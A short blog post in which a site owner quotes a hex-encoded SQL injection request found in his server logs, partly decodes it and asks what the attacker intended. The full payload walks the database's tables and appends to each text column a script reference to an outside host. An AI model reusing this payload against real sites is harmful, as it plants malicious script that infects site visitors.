Dave on Facebook Follow StationaryDave on Twitter
Dave's profile on LinkedIn
My Skype Status
Main: Welcome to Main
Another Bad Person Looking for Trouble?

I found an odd looking request in my log files:

  "/default.asp?guid=road_to_the_derby200303110002;
  declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c 
  417265204054207641726368415228323535292c4063205641 
  52436861522832353529204445634c415245207461426c655f 
  637552736f7220635552734f5220466f722073654c65637420 
  412e4e414d652c622e4e614d452066724f6d207379736f624a 
  4543747320612c735973634f6c756d4e732062207768455265 
  20412e69643d422e496420616e4420412e58747950653d2755 
  2720616e642028622e78745970453d3939206f5220622e7854 
  5970653d3335204f7220622e78745970653d323331204f5220 
  422e78547950653d31363729204f70654e205441424c455f43 
  7572736f52204665546368204e4578542046524f6d20744162 
  6c655f435572736f7220494e546f2040542c4063207748496c 
  6528404046457443485f7354615455733d302920624567696e 
  20657845632827557064617445205b272b40742b275d205365 
  54205b272b40432b275d3d727472494d28436f4e7645725428 
  766152436841522834303030292c5b272b40432b275d29292b 
  63617354283078334337333633373236393730373432303733 
  37323633334436383734373437303341324632463737373737 
  37324536393645363436353738364137333245373237353246 
  37303631363736353245364137333345334332463733363337 
  32363937303734334520415320764152436861722835322929 
  2729206645746368204e4578742066726f4d205441626c655f 
  635552736f7220696e744f2040742c404320654e6420434c6f 
  5345205461624c655f437552734f72204445614c6c6f436174 
  65207441626c655f435572736f7220%20as%20varchar(4000 ));exec(@s);--
  

The seemingly meaningless numbers are Hexidecimal code. Using http://www.string-functions.com/hex-string.aspx, I converted the Hex code into this string:

  /default.asp?guid=road_to_the_derby200303110002;dec lare%20@s%20varchar(4000);set%20@s=
DeCLAre @T vArchAR(255),@c VARChaR(255) 
DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b 
whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167) 
OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0) 
bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+
‘’
') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor
%20as%20varchar(4000));exec(@s);--

It looks like they were poking around for a SQLServer instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru). What do you think they were up to? Wonder what would have happened if my web server did have a SQLServer instance running on the same machine (which I don't think it does) and if that .js page had run?

3,330 views.